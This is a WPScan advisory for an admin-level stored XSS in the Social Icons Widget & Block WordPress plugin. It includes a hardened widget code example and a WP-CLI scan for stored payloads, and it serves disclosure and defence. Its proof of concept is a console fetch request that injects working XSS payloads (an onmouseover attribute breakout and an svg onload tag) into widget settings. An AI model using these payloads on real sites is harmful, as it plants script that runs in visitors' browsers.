wpvulndb | Dmitrii Ignatyev | WPVDB-ID: B8661FBE-78B9-4D29-90BF-5B68AF468EB6
Published: Apr 30, 2024 - 12:00 a.m.

Social Icons Widget & Block < 4.2.18 - Admin+ Stored XSS

Source: wpscan.com
Tags: plugin vulnerability xss admin privilege poc update date

AI Score: 5.4 Medium
Confidence: High

Description

The plugin does not sanitise and escape some of its widget settings, which allows high-privilege users such as administrators to perform stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). On a single site an administrator normally holds unfiltered_html anyway; the issue matters where that capability has been withheld, which is the default for site administrators on multisite (only super admins have it) and on any install that defines DISALLOW_UNFILTERED_HTML. Widget instances are saved through update_option() rather than the post content filters, so core applies no kses filtering to them: the plugin itself has to sanitise on save and escape on output.
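As an added illustration of the defect class the description names (this is example code, not the plugin's own code and not the vendor's fix, which may differ), the WP_Widget subclass below contrasts the vulnerable pattern, settings stored as submitted and printed raw, with the usual remedy: normalise each setting to its expected type in update() and escape it again at the point of output in widget(). The class name, option keys and the fallback colour are assumptions; the field names mirror those used in the PoC. PHP because that is what a WordPress widget is written in.

```php
<?php
// Added example, not code from the Social Icons Widget & Block plugin.
// Class name and defaults are assumptions; field names follow the PoC.

// Vulnerable pattern (what the advisory describes):
//   public function update( $new, $old ) { return $new; }   // stored verbatim, no kses in core
//   echo '<a style="color:' . $icon['color'] . '" aria-label="' . $icon['aria'] . '">';  // printed raw
// A colour value of  123" onmouseover='alert(/XSS/)'  therefore breaks out of the attribute.

class Example_Social_Icons_Widget extends WP_Widget {

    public function __construct() {
        parent::__construct( 'example-social-icons', 'Example Social Icons' );
    }

    // Hardened update(): coerce every field to the type it is supposed to be.
    // This runs for every user, including administrators without unfiltered_html.
    public function update( $new_instance, $old_instance ) {
        $instance                 = array();
        $instance['title']        = sanitize_text_field( $new_instance['title'] ?? '' );
        $instance['description']  = wp_kses_post( $new_instance['description'] ?? '' );
        $instance['open_new_tab'] = ! empty( $new_instance['open_new_tab'] );

        // Per-icon arrays arrive as parallel lists; sanitise element by element.
        $urls   = (array) ( $new_instance['url_fields'] ?? array() );
        $labels = (array) ( $new_instance['label_fields'] ?? array() );
        $colors = (array) ( $new_instance['color_picker_fields'] ?? array() );
        $arias  = (array) ( $new_instance['aria_label_fields'] ?? array() );

        $instance['icons'] = array();
        foreach ( $urls as $i => $url ) {
            // sanitize_hex_color() returns '' for empty input and null for anything
            // that is not #rgb / #rrggbb, so the onmouseover payload is dropped.
            $color = sanitize_hex_color( $colors[ $i ] ?? '' );
            $instance['icons'][] = array(
                'url'   => esc_url_raw( $url ),
                'label' => sanitize_text_field( $labels[ $i ] ?? '' ),
                'color' => $color ? $color : '#000000', // assumed fallback colour
                'aria'  => sanitize_text_field( $arias[ $i ] ?? '' ),
            );
        }
        return $instance;
    }

    // Output: escape at the point of use regardless of what is stored,
    // so a value written before the fix cannot execute either.
    public function widget( $args, $instance ) {
        echo $args['before_widget'];
        if ( ! empty( $instance['title'] ) ) {
            echo $args['before_title'] . esc_html( $instance['title'] ) . $args['after_title'];
        }
        if ( ! empty( $instance['description'] ) ) {
            echo '<p>' . wp_kses_post( $instance['description'] ) . '</p>';
        }
        $target = ! empty( $instance['open_new_tab'] ) ? ' target="_blank" rel="noopener"' : '';
        echo '<ul class="social-icons">';
        foreach ( (array) ( $instance['icons'] ?? array() ) as $icon ) {
            printf(
                '<li><a href="%s" aria-label="%s" style="color:%s"%s>%s</a></li>',
                esc_url( $icon['url'] ),
                esc_attr( $icon['aria'] ),  // neutralises  ' ><svg/onload=alert(123)//>
                esc_attr( $icon['color'] ), // already a hex colour; escaped anyway
                $target,
                esc_html( $icon['label'] )
            );
        }
        echo '</ul>';
        echo $args['after_widget'];
    }
}
```

Both halves matter: sanitising in update() keeps bad data out of wp_options, and escaping in widget() protects against data that got in earlier or through another path (a direct option write, an import). Dropping either one reintroduces the bug.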

PoC

1. As an administrator, visit /wp-admin/widgets.php and add a "Social Icons from WPZoom" widget.

2. Open your browser's console and paste the following command:

    await fetch("/wp-admin/admin-ajax.php", {
        "credentials": "include",
        "headers": {
            "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
        },
        "body": [
            "widget-zoom-social-icons-widget%5B2%5D%5Btitle%5D=Follow+us",
            "widget-zoom-social-icons-widget%5B2%5D%5Bdescription%5D=asdasd",
            "widget-zoom-social-icons-widget%5B2%5D%5Bopen_new_tab%5D=true",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_alignment%5D=none",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_style%5D=with-canvas",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_canvas_style%5D=round",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_padding_size%5D=8",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_font_size%5D=18",
            "widget-zoom-social-icons-widget%5B2%5D%5Bglobal_color_picker%5D=%231e73be",
            "widget-zoom-social-icons-widget%5B2%5D%5Bglobal_color_picker_hover%5D=%231e73be",
            // Icon 1: payloads in the colour field (attribute breakout) and the aria-label field (tag injection)
            "widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Ffacebook.com%2F",
            "widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=Facebook",
            "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=123%22%20onmouseover=%27alert(/XSS/)%27",
            "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%230866FF",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=facebook",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon",
            "widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=%27%20%3e%3csvg/onload=alert(123)//%3e",
            // Icon 2: benign values
            "widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Fx.com%2F",
            "widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=X",
            "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23000000",
            "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23000000",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=x",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon",
            "widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=",
            // Icon 3: benign values
            "widget-zoom-social-icons-widget%5B2%5D%5Burl_fields%5D%5B%5D=https%3A%2F%2Finstagram.com%2F",
            "widget-zoom-social-icons-widget%5B2%5D%5Blabel_fields%5D%5B%5D=Instagram",
            "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_fields%5D%5B%5D=%23e4405f",
            "widget-zoom-social-icons-widget%5B2%5D%5Bcolor_picker_hover_fields%5D%5B%5D=%23e4405f",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_fields%5D%5B%5D=instagram",
            "widget-zoom-social-icons-widget%5B2%5D%5Bicon_kit_fields%5D%5B%5D=socicon",
            "widget-zoom-social-icons-widget%5B2%5D%5Baria_label_fields%5D%5B%5D=",
            // Bookkeeping fields expected by the save-widget admin-ajax handler; the nonce is read from the widgets.php page
            "widget-id=zoom-social-icons-widget-2",
            "id_base=zoom-social-icons-widget",
            "widget-width=250",
            "widget-height=200",
            "widget_number=-1",
            "multi_number=2",
            "add_new=",
            "action=save-widget",
            `savewidgets=${_wpnonce_widgets.value}`,
            "sidebar=sidebar-1"
        ].join("&"),
        "method": "POST",
        "mode": "cors"
    });

3. Visit the site's homepage and notice that the test alert boxes execute.
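For incident response on a site that ran an affected version, the following is an added check (not part of the advisory and not the plugin's own code) that reads the widget's stored instances and flags values that cannot be a colour or a plain label. It relies on core's convention that a WP_Widget with id_base X keeps its instances in the option widget_X, and on the field names seen in the PoC; the regular expression and the list of fields are assumptions chosen to match the two payload shapes above. Run it through WP-CLI with `wp eval-file`.

```php
<?php
// Added example, not part of the advisory or the plugin.
// Usage: wp eval-file scan-social-icons.php
// Looks through the stored instances of the widget for attribute breakouts,
// event handlers and tags in fields that should hold a colour or plain text.

$id_base = 'zoom-social-icons-widget';          // from the PoC (id_base=...)
$fields  = array(                                // assumed list, taken from the PoC
    'title', 'description',
    'global_color_picker', 'global_color_picker_hover',
    'color_picker_fields', 'color_picker_hover_fields',
    'label_fields', 'aria_label_fields',
);

// Heuristic: a tag bracket, an on*= handler, or a quote followed by attr=.
// Matches  123" onmouseover='alert(/XSS/)'  and  ' ><svg/onload=alert(123)//>
// but not #0866FF, "Follow us" or "Facebook".
function example_looks_injected( $value ) {
    return (bool) preg_match( '/[<>]|\bon[a-z]+\s*=|["\']\s*[a-z-]+\s*=/i', (string) $value );
}

// Core stores every instance of a multi-widget under 'widget_' . $id_base,
// keyed by instance number, plus a '_multiwidget' marker.
$instances = get_option( 'widget_' . $id_base, array() );
$hits      = 0;

foreach ( $instances as $number => $instance ) {
    if ( ! is_array( $instance ) ) {
        continue; // '_multiwidget' => 1
    }
    foreach ( $fields as $field ) {
        // Single-valued settings are wrapped so the same loop handles both shapes.
        foreach ( (array) ( $instance[ $field ] ?? array() ) as $i => $value ) {
            if ( example_looks_injected( $value ) ) {
                $hits++;
                WP_CLI::warning( sprintf( 'instance %s: %s[%s] = %s', $number, $field, $i, $value ) );
            }
        }
    }
}

WP_CLI::log( $hits ? "$hits suspicious value(s) found" : 'no suspicious values found' );
```

A hit is evidence that something was stored, not that it rendered; check the theme's sidebars and the site's front page for the affected instance number, and clear the values through the widget editor after updating the plugin.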

Affected software (CPE)

Name | Operator | Version
     | eq       | 4.2.18

